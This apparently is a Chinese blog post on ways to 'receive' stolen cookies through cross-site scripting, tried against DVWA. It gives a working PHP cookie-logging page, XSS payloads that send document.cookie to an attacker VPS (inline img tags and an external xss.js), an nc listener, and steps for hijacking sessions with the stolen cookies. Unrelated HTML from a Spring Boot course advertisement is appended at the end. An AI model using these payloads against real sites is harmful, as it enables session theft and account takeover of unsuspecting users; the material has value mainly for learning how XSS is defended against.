接收Cookie总结

0x01 前言

最近总结了一下自己接收cookie的方法,和大家分享一下。来源于平时的积累和良师益友的分享。

0x02 进入正题

一:通过XSS平台接收cookie。
这个相信每个人都用过,是大家接收cookie最常用的一种方式。
1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。
在这里插入图片描述

2.在这里我们勾选默认模块,默认模块就是盗取cookie的,然后选择keepsession。
在这里插入图片描述

3.然后我们点击下一步,我们“cookie盗取”的项目就创建好了。
在这里插入图片描述

4.下面我们便可以将构造好的盗取cookie的payload发送给受害者,这里我们用DVWA做测试。我们可以直接使用XSS平台的payload,也可以自行构造payload。在这里我们直接使用XSS平台的payload。
在这里插入图片描述

5.查看我们接收到的cookie。
在这里插入图片描述

6.cookie利用。
方法一:利用火狐插件"tamper data",将我们抓取的cookie添加进去。
在这里插入图片描述

点击OK,登录成功。
在这里插入图片描述

方法二:使用F12调试调试工具,找到我们的cookie,将cookie替换为我们抓取到的cookie。
在这里插入图片描述

再次访问“127.0.0.1/dvwa/”,即可登陆成功。

二:通过PHP页面接收cookie。
大家可以把接收cookie的PHP页面放到自己的vps上,这种方法用来接收用户cookie也是非常好用的。
1.在自己LAMP环境的vps上新建一个名为receive.php的页面,键入以下代码接收cookie。

<?php
	$cookie=$_GET['cookie'];
	$ip=getenv('REMOTE_ADDR');
	$time=date('Y-m-d g:i:s');
	$referer=getenv('HTTP_REFERER');
	$rec=fopen('cookie.txt','a');
	fwrite($rec,"IP:".$ip."| time:".$time."| referer:".$referer."| cookie:".$cookie."\n");
	fclose($rec);
?>

接下来我们就需要构造可以发送用户cookie到我们vps的payload。这里有以下2种方法。
方法一:直接利用script和img标签构造发送cookie的payload。
这种方法构造的payload较长。在DVWA有对输入字符长度的限制,这里我们可以通过审查元素绕过。

<script>document.write('<img src="http://vps/receive.php?cookie='+document.cookie+'" />')</script>

在这里插入图片描述

添加成功后,在我们vps中receive.php所在页面生成了一个名为cookie.txt的文件,盗取用户的cookie就被保存在这个文件中。
在这里插入图片描述

方法二:加载外部JS文件盗取cookie。
这样我们可以将更多的XSS代码放到外部的JS文件中,非常方便。这样也可以减小我们输入字符的长度。

<script src="http://vps/xss.js"></script>

xss.js文件内容:

new Image().src="http://vps/receive.php?cookie="+document.cookie;

在这里插入图片描述

接下来我们将payload插入到DVWA中。
在这里插入图片描述

插入成功后,同样在我们的cookie.txt中接收到了用户的cookie。
在这里插入图片描述

三:通过nc接收用户cookie。
1.构造插入到DVWA中的payload:

<script>document.write('<img src="http://vps/?'+document.cookie+'" />')</script>

在这里插入图片描述

2.在自己的vps中监听本地80端口(如果想从别的端口监听,需要在payload中vps地址后面加上指定的端口号)。

命令:nc -lvp 80

在这里插入图片描述

3.将我们的payload插入到DVWA中,成功监听到用户的cookie。
在这里插入图片描述

0x03 后记

本文所介绍的内容都比较基础,主要是想和大家分享一下,还有许多我不知道的接收cookie的方法,希望能和大家一起交流补充,谢谢。

已标记关键词 清除标记
相关推荐
<p> <span style="color:#4d4d4d;">当前课程中博客项目的实战源码是我在 GitHub上开源项目 My-Blog,目前已有 2000 多个 star:</span> </p> <p> <span style="color:#4d4d4d;"><img src="https://img-bss.csdnimg.cn/202103310649344285.png" alt="" /><br /> </span> </p> <p> <span style="color:#4d4d4d;">本课程是一个 Spring Boot 技术栈的实战类课程,课程共分为 3 大部分,前面两个部分为基础环境准备和相关概念介绍,第三个部分是 Spring Boot 个人博客项目功能的讲解,<span style="color:#565656;">通过本课程的学习,不仅仅让你掌握基本的 Spring Boot 开发能力以及 Spring Boot 项目的大部分开发使用场景,同时帮你提前甄别和处理掉将要遇到的技术难点,认真学完这个课程后,你将会对 Spring Boot 有更加深入而全面的了解,同时你也会得到一个大家都在使用的博客系统源码,你可以根据自己的需求和想法进行改造,也可以直接使用它来作为自己的个人网站,这个课程一定会给你带来巨大的收获。</span></span> </p> <p> <span style="color:#4d4d4d;"><span style="color:#565656;"> </span></span> </p> <p> <span style="color:#e53333;"><span style="color:#e53333;"><strong>课程特色</strong></span></span> </p> <p> <span style="color:#e53333;"><span style="color:#e53333;"><strong> </strong></span></span> </p> <p> <span style="color:#4d4d4d;"><span style="color:#565656;"> </span></span> </p> <ol> <li> <span style="color:#565656;">课程内容紧贴 Spring Boot 技术栈,涵盖大部分 Spring Boot 使用场景。</span> </li> <li> <span style="color:#565656;">开发教程详细完整、文档资源齐全、实验过程循序渐进简单明了。</span> </li> <li> <span style="color:#565656;">实践项目页面美观且实用,交互效果完美。</span> </li> <li> <span style="color:#565656;">包含从零搭建项目、以及完整的后台管理系统和博客展示系统两个系统的功能开发流程。</span> </li> <li> <span style="color:#565656;">技术栈新颖且知识点丰富,学习后可以提升大家对于知识的理解和掌握,对于提升你的市场竞争力有一定的帮助。</span> </li> </ol> <p> <strong>实战项目预览</strong> </p> <p> <span style="color:#4d4d4d;"><span style="color:#565656;"><span style="color:#e53333;"><strong> </strong></span></span></span> </p> <p> <span style="color:#4d4d4d;"><img src="https://img-bss.csdn.net/202005150303066258.png" alt="" /><br /> </span> </p> <p>   </p> <p> <span style="color:#4d4d4d;"> </span> </p> <p> <span style="color:#4d4d4d;"><img src="https://img-bss.csdn.net/202005150305396930.png" alt="" /><br /> </span> </p> <p> <span style="color:#4d4d4d;"> </span> </p> <p> <span style="color:#4d4d4d;"><img src="https://img-bss.csdn.net/202005150305528842.png" alt="" /><br /> </span> </p> <p> <span style="color:#4d4d4d;"> </span> </p> <p> <span style="color:#4d4d4d;"><img src="https://img-bss.csdn.net/202005150306056323.png" alt="" /><br /> </span> </p>
©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页